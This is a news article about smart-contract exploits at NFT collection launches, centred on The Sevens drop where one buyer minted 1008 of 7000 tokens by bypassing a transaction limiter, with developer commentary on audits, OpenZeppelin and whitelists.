The highly-anticipated project, The Sevens, is the latest NFT collectible to fall victim to an exploit in their smart contract, allowing a member of their community @1ethSHOP to mint 1008 of the 7000 collectibles during the project’s launch on Tuesday, the 7th of September.
@skidrowcrypto covered a similar exploit in the Chiptopunks smart contract on the 23rd of August, showing how vulnerabilities in Solidity coding are an ongoing problem for the NFT collectibles ecosystem.
#chiptopunks and other collectibles I've seen launch lately have brought me to the realization that just because you can develop a generative art project doesn't mean you can release it in a satisfactory way or make it fair or even sell them all in any reasonable amount of time.
— Micah Ray (@skidrowcrypto) August 20, 2021
One of the developers of Chiptopunks, gaper.eth, stated that “This is frowned upon by the community, but most people are anonymous, making it impossible for us to reach out to the guy that minted 150 of the 512 Chiptos. So, on the developers’ side, there isn’t really much to do other than prepare for the next time to make sure that this doesn’t happen again.”
The Sevens were truly lucky that the culprit, a fanatical supporter of the project who got “carried away with minting,” contacted the developers through their Discord to help deal with the aftermath of the breach. After lengthy negotiations, the development team was able to recover 500 of the NFTs.
We have not sold any Seven tokens on the market after handing 500 back, we will continue to support the project and have only moved some of our tokens into cold wallets.
— 1ethSHOP (@Shop1eth) September 8, 2021
However, not every development team can be so fortunate. Gaper.eth commented that “if one account holds a large portion of the collection, it may make the project less desirable.” Unfortunately, this kind of activity also permeates NFT culture, resulting in FUD and raising suspicions of malpractice, insider activity, and manipulation.
“So, what happened?” The Sevens team explained in their published statement regarding their roll-out strategy:
“Quite simply, we allowed minting via contract to allow an array of interested parties to engage with our project. Research was conducted into other popular project launches, and we found that this was the most inclusive setup. This was common practice. Looking back, should we have blocked contract-level interaction, yes. So we sincerely apologize for this.”
Without some kind of standard, peer-review or external audit, individuals well-versed in Ethereum’s coding language, Solidity, can identify and exploit holes in the publicly available and (often) copy-and-pasted smart contracts. @OxBender offered a technical deep-dive into how The Sevens transaction limiter was circumvented.
How did someone buy 1,000 NFTs from the Sevens drop using minimal gas with gwei pinned at 5k+ and the contract limiting txns to 1 per?
Technical deep dive below, strap in 👇
— bender (@0xBender) September 7, 2021
“What happens in practice is that people see that one contract works, so they will go and use that contract and try to do what that contract did,” gaper.eth commented. “Once that contract comes out to solve this issue, most people will probably copy it and after that, it will become standard practice.”
@Mikeejt, the developer of the upcoming Eternal Royals NFT, stated that OpenZeppelin has emerged as the standard for smart contracts and other blockchain applications. “There’s no need for an external audit of a smart contract, which is usually very expensive. OpenZeppelin provides libraries and code for developers for best practices in relation to smart contracts and also provides this audit function should you need it.”
Despite their controversial launch, The Sevens team have made efforts to be transparent and fair throughout the development, launch, and post-launch, showing a commitment to their goals for the project.
As promised by the project’s innovative roadmap, the culturally relevant iconography found within The Sevens NFTs will set the principal themes for questions that the community will need to answer in an event known as the “Treasure Hunt.” The properties and remarkable artwork of these 7000 unique collectibles include references to pop culture, memes, games, movies, anime, and more, promising to make for treasure hunting of OASIS-sized proportions. With a backstory set in a dystopian future and taglines such as “Our salvation is the metaverse” and “The Sevens are keys” on their official website, it’s hard to believe that the developers were not inspired by Ernest Cline’s Ready Player One, which also features a hunt for “Halliday’s Easter Egg.” Not unlike James Halliday, the developers of The Sevens sought to share their passion for 21st-century culture, receiving (almost) overwhelming support from the NFT community, as evidenced by The Sevens Discord server being 70 000+ members strong at the time of writing this article.
With such a strong foundation for the launch of an NFT collectible, it’s understandable that FOMO levels were well over 9000. The fear of missing out on owning one of the 7000 collectibles was further exacerbated by a pre-sale event organized by the developers that was harder to get into than an otaku’s bento box.
“Gas wars” is a term used to describe when the price to transact on the Ethereum blockchain is exorbitantly high due to high volumes of transactions, causing the gas price to spike. (Pictured: It’s Always Sunny in Philadelphia opening, Season 4, Episode 2).
Developers in the NFT collectibles space have been deliberating how to achieve a fair collection distribution while simultaneously mitigating exorbitant gas fees that inevitably arise on the Ethereum blockchain. Using a pre-sale “whitelist” has been one of the ways that projects have tried to circumvent gas wars. However, adding and updating an on-chain whitelist is quite costly and/or time-consuming. Furthermore, whitelists can’t guarantee that someone will actually buy the NFT at launch, nor can it prevent someone from exploiting your transaction limiter to buy 1008. This kind of behaviour makes it so much more attractive for projects to do “stealth drops” at the cost of being less inclusive.
@Mikeejt plans for the Eternal Royals NFT to “have a large list of whitelisted addresses, but there’s no guarantee that they will buy an NFT at launch. This is why participation on Discord as well as other social media engagement such as Twitter and Clubhouse are important to show interest in our project.”
The Sevens is a testament to the mint-mania that happens at launch around super popular NFT collectibles, however, it serves as a cautionary tale to developers to learn from the mistakes of others. While the decentralized nature of the NFT collectible space doesn’t exactly allow for representations and warranties, adding the contract’s address to the project’s website creates an air of credibility. The Sevens team stated that “As the blockchain motto goes: ‘don’t trust, verify,’ we’re not just promising not to cheat, we’re proving that we cannot cheat, even if we wanted to.”
If developers want to add another layer of security and grow the trust of the NFT community, it would be prudent for them to do their due diligence to assure their communities that any loopholes in their smart contracts have been plugged. “It’s really difficult to find a one-size-fits-all solution to this problem,” gaper.eth commented. “We need to group-think this through to find the best solution.”
For more on The Sevens:
Official Sevens site:
The Sevens medium publications:
The sevens official opensea account:
Link to the sevens official Discord: